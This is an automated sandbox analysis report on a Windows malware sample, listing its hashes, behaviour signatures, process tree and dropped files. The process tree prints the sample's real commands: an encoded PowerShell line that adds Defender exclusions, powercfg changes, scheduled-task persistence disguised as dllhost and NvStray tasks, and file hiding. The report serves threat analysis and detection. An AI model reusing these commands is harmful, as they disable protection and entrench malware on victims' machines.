Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2023 19:47

General

  • Target

    file.exe

  • Size

    2.5MB

  • MD5

    0a5acc42c666a7cfebf9ea8db9005c6b

  • SHA1

    de5d9e45289121015022e326c5899aa23060f777

  • SHA256

    9e9cdc500aba915c0774caeb19543064db51f8a6c426d1e881a91eb4d7cb7409

  • SHA512

    063db9f94aa40147f52fa60a8135cf57ec8943d99fb56160ad3cfcb07534b055c7498db8ec788069ed42821b16f8df3064d14b2d708fb9b1d61ab472fe7d27bf

  • SSDEEP

    49152:Xs5jI+NyvqpBJheWy2pp0erKZCC/bPSRuIWE2VeOZZ1WbeD0ccnWj+Qh/:Xs5jI+NtBeWy2pp0RHSoIhqWbeDEnI/

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:4880
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e file.zip -p17850190232312488986888555 -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_11.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4128
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_10.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4572
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_9.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4616
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_8.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3116
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_7.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:748
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_6.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2916
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4644
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4636
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:772
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2560
        • C:\Users\Admin\AppData\Local\Temp\main\7gf943hf34uht43t3.exe
          "7gf943hf34uht43t3.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3500
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C powershell -EncodedCommand "PAAjAGwATwAyAGEAMABmAFUAbwBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABNAFUAdgBNAEgAMgBCAFQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBEAGQAUgA4AHMAdwA2AGoAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAGMAMgBIAEEAVQA3AEoANgBuAEsAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3444
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAGwATwAyAGEAMABmAFUAbwBTACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdABNAFUAdgBNAEgAMgBCAFQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYgBEAGQAUgA4AHMAdwA2AGoAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAGMAMgBIAEEAVQA3AEoANgBuAEsAIwA+AA=="
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4092
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5941" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4808
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5941" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:1100
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:4964
        • C:\Windows\system32\attrib.exe
          attrib +H "7gf943hf34uht43t3.exe"
          3⤵
          • Views/modifies file attributes
          PID:4384
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzastxh5.1xt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\main\7gf943hf34uht43t3.exe

      Filesize

      21KB

      MD5

      b30cb3c61170a8886db74c762a435de7

      SHA1

      179996547a612e70d35f494dff22ada2ca7f4c4a

      SHA256

      4ef9d084f5dcd988b913020971af6649434887e798e7b44a9d3ca8965dd786fe

      SHA512

      6a971156616a9e3a617eb5217d7d35fc1132be01d0a03a29f4d08b73a24e60591adab04e8170899c237f20349c137d46ea2c6778000bf9549fcc04eb1a81c45f

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\7gf943hf34uht43t3.exe

      Filesize

      21KB

      MD5

      b30cb3c61170a8886db74c762a435de7

      SHA1

      179996547a612e70d35f494dff22ada2ca7f4c4a

      SHA256

      4ef9d084f5dcd988b913020971af6649434887e798e7b44a9d3ca8965dd786fe

      SHA512

      6a971156616a9e3a617eb5217d7d35fc1132be01d0a03a29f4d08b73a24e60591adab04e8170899c237f20349c137d46ea2c6778000bf9549fcc04eb1a81c45f

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

      Filesize

      2.1MB

      MD5

      c627da8ef2131f5bd670f0b088ade54e

      SHA1

      766bbecbaeb1d7abf58f3b418558b5a93dc34b4d

      SHA256

      54c2d195b489f9a03dcc204143d5c5e3dc0c51b2a1645ffb09c998d780f46c8b

      SHA512

      f2fad498904a9dd14ea339cdf3829bf6d57d636dd6b60c9d05255044d20d6347530b684d96e439be7269bad56d5e735a04f72fc7abe20b5fb8916334c5109725

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

      Filesize

      9KB

      MD5

      45efbea3cb00c850fb25a3d33ba74177

      SHA1

      ca2bb6393e11ebee0b30a56824edf2bd8a8f0407

      SHA256

      be9b2bdd048da4fddb3cfeb63cdfbd7f10f85de49ec6063582a0114674286bfb

      SHA512

      b5eb9e9a5442ee5f9c5787982447d63cb591e2ad76f54056e2bd85dfc7c5aee7e5afa8e9854cf54bd913bda9b02ea536330dbcf06e036c094be724bc0d12c5ab

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_10.zip

      Filesize

      10KB

      MD5

      0d2c8e964632fc0d4ffa717f42ebcafe

      SHA1

      4b5ed0b2386c610bf71fa26f8726b8f4f865dd64

      SHA256

      f1db671259b995074fd146f37e9c2df016edc677190e12fd427e1f89139c18c6

      SHA512

      714918b7c6db46ef45dc467fd680275d52001ef2d22b7772190a98f9a6074f2bb7750836a0cf36b1a597e418edb572032843073fd751dfa69676d67ef5fd214b

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_11.zip

      Filesize

      1.6MB

      MD5

      ed60d4f4c293e4222f7fa6fdc4027f1b

      SHA1

      d3ab612c6fd9f867cf5bf14a5437ca3143120c74

      SHA256

      1378ea2b933135d7b2183961d4b3f80128a9977749240d38578ea3f995b8e459

      SHA512

      a06f80578008471324c32f1dd4d449974047c47584889c6588b1bca8ac9114359a9fe5fd0e67c322dbfd47bbd6e097d7fc37e16ab4168d509e556074a120a112

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

      Filesize

      9KB

      MD5

      0b51b07c6c64efe7f49b02ecf0c2dd55

      SHA1

      47b79b6987222120f344409b791c1940fab549ad

      SHA256

      bd5ee40d5fc7f6255aff8e82e83b4cf78c3937c02e8de28602194b961d6aa66b

      SHA512

      229f6d2400bd2a61d006d06e54417f8afb01d2cf16738fb093b6938255600b5efa8e60b6aba8d07361f10b32ed9fd85e8c193ef119c29c5b7f197a6aa79c2e2c

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

      Filesize

      9KB

      MD5

      1182230403272dc14e911eeed8269538

      SHA1

      131d432e1e78f3e748120596706d2b7f843bc96f

      SHA256

      32fc320fffbf72c0ae205261aaf6cee7a1d59b8c8d90c90dfa5e6700059fb575

      SHA512

      1a3e0702e5940e58586204382dc459c76ad6656f8b8ea2c7e84665107237a8e6d2833d8447d91d87625d5293cdd102a59dab25aa7aae94b01e6af16dbf40d3f9

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

      Filesize

      9KB

      MD5

      f75d8fdd303eb9ab85294026ae3f494f

      SHA1

      fce2c79c9dce7b1687bd40c044cfe86578b443ef

      SHA256

      b88e3a93be99f781a1d7bc55e3f0073c7ff8dc4d843542a1aa4bf92a2b5202bf

      SHA512

      ee79a9421a052951eed09e184b999adc9a23fd49b842edbb9ee195a8ba2faefb297e039370c363f665e8a8fdec0eb8abcee6161ed8804aa13de56271b9c74f6e

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

      Filesize

      9KB

      MD5

      b4fba2e6e18cc3f2dfdb39ccd540e29e

      SHA1

      43ac06abf2b0221c55ce147a0b17fa4bf23f020c

      SHA256

      3ead7c7dc252fb186481ac0e62fa2fc0bd90b6100d198c3fe0e4a144815ec98b

      SHA512

      a7f51b52339c553ba794a384984c2920efebabda61517ecc848db01555c398c275a7280169b3f622531f7a8e86a65502b1b274286498e5f77aba9c0ce7e9cf29

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

      Filesize

      10KB

      MD5

      23f87087c471a8cb9ac4119fcd761f81

      SHA1

      5e373fa26e309b7e66d73d75e19726f53de42ab6

      SHA256

      4cb16cfca52070cde7009c3bd9ae1f19de5f78a9c2a0576fc7596a85a9d57b0d

      SHA512

      9056e1341786161e08f1041ad9056832f9814311eac843fb2e5f2b389f21ed103e328f3725a08c3bb247c552d280487010d3b545444f149ed0e38740ec26ee11

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

      Filesize

      10KB

      MD5

      9adb559d99714d9f45ca31f558398355

      SHA1

      f228d22ccc31cb36aac829107a9ec830d376439e

      SHA256

      ed89e559c08248d451e2fb04138a980cba1bd2bdcd05e879dfa1318c9b02af99

      SHA512

      e4bc1d44786dccc7046585068f52c1aed2f84131d7d14780ba95ce09f5754b9671a526826c3ecf6e3d0c4ed36e1a38d866a840eaf6497414b6093882482f2da3

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

      Filesize

      10KB

      MD5

      25411a5babd8c235cde8680ffafa55c1

      SHA1

      9d80a0a2b1f604706d0beaa94cad4a1d27c78cb3

      SHA256

      87a533b7e910dd312b4263d9cea19c3a73c3534ca9b24a4a0cd7c649a3853226

      SHA512

      197a2287225d70640700d93731adc214874404883819b29328863451c9d86ade3018c11a2abe1956c9742468b1c6959b279c375f1873691663646e222c30c943

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

      Filesize

      10KB

      MD5

      5fb38a59b0cae99dbe301d593122545e

      SHA1

      39acce65ef1eb1b31567faaeeb81780416f666b9

      SHA256

      0ee8c715e75608850190a1a647540be26d85708468d2defa34e478bcc7fe714c

      SHA512

      49a85afedd53769eaf0df6f931f543b50c9dec8b6a7f1065edb7cb60fb69009214f32882dcf97e7ea5e18f1d1486b37b40f9a4e8ec79dcbb97328687a4c485fc

    • C:\Users\Admin\AppData\Local\Temp\main\file.bin

      Filesize

      1.6MB

      MD5

      197295dfb2ee144ca127c2c810b2cada

      SHA1

      2bb454bd869b60f7a2f30619dc21e8e6db635df6

      SHA256

      2eea4453750bf857871ad5f56a75f8a6016ef997f98393bdaf531e94fd5a7e04

      SHA512

      88f17e3aa8f03b600334f1c937fb1a480552e7940e40c6e661dc6ca1df53f1a691c7259eb4802a9c8852a08729989efb945651365db35d927ba1ae56bd10ae3d

    • C:\Users\Admin\AppData\Local\Temp\main\main.bat

      Filesize

      513B

      MD5

      691db70833d3468823639bfbf5ce19d2

      SHA1

      c5fde5fee7ea4b707577834501139ea60ac11e24

      SHA256

      16f8dd3539080214e572613e2774bf7b7ac09fc11d17493ccba753091d21285a

      SHA512

      4d185d40c71435575a9a03856fad5e32779da987084ef5322916d46df6bcb64bf431612fbd36fea376fb2a724fac773c3df4ce658bc6808a3d8cd480f5181bfe

    • memory/3500-91-0x0000000073EC0000-0x0000000074670000-memory.dmp

      Filesize

      7.7MB

    • memory/3500-93-0x00000000054F0000-0x0000000005A94000-memory.dmp

      Filesize

      5.6MB

    • memory/3500-94-0x0000000004E20000-0x0000000004EB2000-memory.dmp

      Filesize

      584KB

    • memory/3500-95-0x0000000005090000-0x00000000050A0000-memory.dmp

      Filesize

